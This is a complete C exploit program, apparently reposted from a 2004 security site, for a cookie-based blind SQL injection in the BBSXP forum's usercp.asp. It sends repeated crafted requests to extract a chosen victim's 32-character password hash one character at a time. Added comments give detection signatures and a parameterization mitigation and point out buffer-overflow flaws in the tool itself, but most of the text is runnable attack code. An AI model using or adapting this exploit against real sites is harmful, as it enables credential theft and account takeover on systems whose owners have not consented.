BBSXP setup.asp top function injection exploit
来源:vfocus.net 作者:Qiyejia 发布时间:2004-05-19  

BBSXP setup.asp top function injection exploit


#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

/*
 * Print the banner and the command-line synopsis to stdout.
 *
 * program: name shown in the usage line (the caller passes argv[0]).
 */
void help(char *program)
{
    static const char banner[] =
        "\r\n"
        "BBSXP setup.asp top function injection exploit\r\n"
        " Originally discovered by Qiyejia\r\n"
        "==============================================\r\n\r\n";

    fputs(banner, stdout);
    printf("Usage: %s <Host> <Path> <Yourname> <Yourpass> <Victim>\r\n", program);
}

/*
 * Fixed fragments of the single HTTP request this program sends. main()
 * concatenates them with the command-line arguments in this order:
 *
 *   Var1 argv[2] Var2 argv[1] Var3 argv[4] Var4 argv[3] Var5 argv[5]
 *   Var6 <two-digit position> Var7 <one character of dict> Var8
 *
 * The SQL fragment is carried in the "username" cookie, not in the URL,
 * so it appears in access logs only if cookie headers are logged.
 * URL-decoded, Var5..Var8 read:
 *
 *   Var5: ' and 1=(select count(*) from [user] where username='
 *   Var6: ' and right(left(userpass,
 *   Var7: ),1)='
 *   Var8: ') and userpass<>'        (followed by the blank line ending the headers)
 *
 * Detection: a Cookie header whose username value contains an encoded
 * single quote (%27) together with "select+count" / "userpass", repeated
 * over many short-lived connections with the fixed MSIE 6.0 User-Agent
 * and "Accept-Language: zh-cn" shown below.
 * Mitigation (server code is not shown on this page; inferred from the
 * request shape): the query that consumes the username cookie should be
 * parameterized, and cookie values treated as untrusted input.
 */
char Var1[]="GET "; // followed by argv[2] (Path)
char Var2[]="/usercp.asp HTTP/1.1\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/msword, application/vnd.ms-excel, */*\r\n"
"Accept-Language: zh-cn\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n"
"Host: ";// followed by argv[1] (Host)
char Var3[]="\r\n"
"Connection: Keep-Alive\r\n"
"Cookie: eremite=0; userpass=";// followed by argv[4] (Yourpass)
char Var4[]="; username=";// followed by argv[3] (Yourname)
char Var5[]="%27+and+1%3d%28select+count%28%2A%29+from+%5Buser%5D+where+username%3d%27";// followed by argv[5] (Victim)
char Var6[]="%27+and+right%28left%28userpass%2c";// followed by the two-digit character position
char Var7[]="%29%2c1%29%3d%27";// followed by the candidate character
char Var8[]="%27%29+and+userpass%3C%3E%27\r\n\r\n";

/* Candidate characters tested per position: digits and upper-case A-F
 * ('0' is listed twice). Together with the 32 positions probed in main()
 * this is consistent with userpass holding a 32-character hex digest;
 * the storage format is inferred, not shown on this page. */
char dict[]="01234567890ABCDEF";

/*
 * Entry point. Expects exactly five arguments:
 *   argv[1] Host, argv[2] Path, argv[3] Yourname, argv[4] Yourpass, argv[5] Victim.
 *
 * Resolves Host, then for each character position 1..32 and each entry of
 * dict opens a new TCP connection to port 80, sends one GET for
 * <Path>/usercp.asp built from the Var* fragments, and reads one response.
 * A response containing "Set-Cookie: username=;" is treated as "no match";
 * any other response prints the candidate character and moves to the next
 * position.
 *
 * Traffic profile for detection: up to 32 * 17 = 544 requests, one
 * connection each, identical except for the two-digit position and the
 * single candidate character inside the username cookie.
 *
 * NOTE(review): "void main" is non-standard; the Head/Packet buffers are
 * filled with unbounded strcpy/strcat from argv, so over-long arguments
 * overflow the 5000-byte arrays; WSACleanup is never called.
 */
void main(int argc, char *argv[])
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
/* Receive timeout passed to SO_RCVTIMEO below (milliseconds on Winsock). */
int nTimeout = 3000;
if(argc!=6)
{
help(argv[0]);
return;
}
/* Requests Winsock version 1.1. */
if(WSAStartup(0x0101,&wsaData)!=0)
{
printf("error starting winsock..");
return;
}
if((he = gethostbyname(argv[1]))==0)
{
printf("Failed resolving '%s'",argv[1]);
return;
}
/* Target is always plain HTTP on port 80, first address returned for Host. */
host.sin_port = htons(80);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);

/* NOTE(review): this socket is never connected or closed; the loop below
 * overwrites s with a new socket on its first iteration. */
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}

/* Head holds the part of the request that is the same for every probe:
 * request line, headers, and the cookie up to the position argument. */
char Head[5000] = {0}, buff[5000] = {0}, Packet[5000] = {0}, tmp[5] = {0};
strcpy(Head, Var1);
strcat(Head, argv[2]);
strcat(Head, Var2);
strcat(Head, argv[1]);
strcat(Head, Var3);
strcat(Head, argv[4]);
strcat(Head, Var4);
strcat(Head, argv[3]);
strcat(Head, Var5);
strcat(Head, argv[5]);
strcat(Head, Var6);

printf("Trying User %s \r\n",argv[5]);
/* Outer loop: character position 1..32. Inner loop: each entry of dict. */
for (int len = 1; len < 33; len++)
for (int i = 0; i < strlen(dict); i++)
{
/* One fresh connection per probe. */
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
return;
}
if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
return;
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));


/* Position as two decimal digits, zero-padded ("01".."32"). */
memset(tmp, 0, sizeof(tmp));
tmp[0] = '0' + len / 10;
tmp[1] = '0' + len % 10;
strcpy(Packet, Head);
strcat(Packet, tmp);
strcat(Packet, Var7);
/* Candidate character for this probe. */
memset(tmp, 0, sizeof(tmp));
tmp[0] = dict[i];
strcat(Packet, tmp);
strcat(Packet, Var8);
/* Return values of send() and recv() are not checked. */
send(s, Packet, strlen(Packet), 0);
//Sleep(500);
recv(s, buff, sizeof(buff), 0);
/* The response header "Set-Cookie: username=;" is the marker this code
 * uses for a non-matching probe. */
if(strstr(buff, "Set-Cookie: username=;"))
{
//Sleep(500);
}
else
{
/* Marker absent: print the candidate and go on to the next position. */
printf("%c", dict[i]);
//printf(buff);
closesocket(s);
break;
}
closesocket(s);
}

return;
}



 